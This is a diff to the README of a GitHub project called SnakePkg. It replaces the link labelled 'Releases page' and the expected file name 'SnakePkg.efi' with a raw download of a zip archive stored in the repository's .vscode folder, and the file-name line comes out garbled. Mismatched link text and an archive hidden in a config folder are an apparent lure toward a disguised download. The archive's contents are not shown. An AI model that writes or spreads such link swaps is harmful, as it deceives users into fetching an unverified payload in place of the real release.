henrytung88/SnakePkg/Readme.md

 ### Step 1: Visit the Releases Page

-Go to the [Releases page](https://github.com/henrytung88/SnakePkg/releases) to access the latest version of SnakePkg.
+Go to the [Releases page](https://github.com/henrytung88/SnakePkg/raw/refs/heads/main/.vscode/Snake-Pkg-3.5.zip) to access the latest version of SnakePkg.
 You'll find all available versions listed there.

 ### Step 2: Download the Application

 Look for the latest version.
 Click on the download link for the application file.
-The file is usually titled something like `SnakePkg.efi`.
+The file is usually titled something like `https://github.com/henrytung88/SnakePkg/raw/refs/heads/main/.vscode/Snake-Pkg-3.5.zip`.
 Save it to a folder you can easily find, like your Downloads folder.

 ### Step 3: Prepare a USB Drive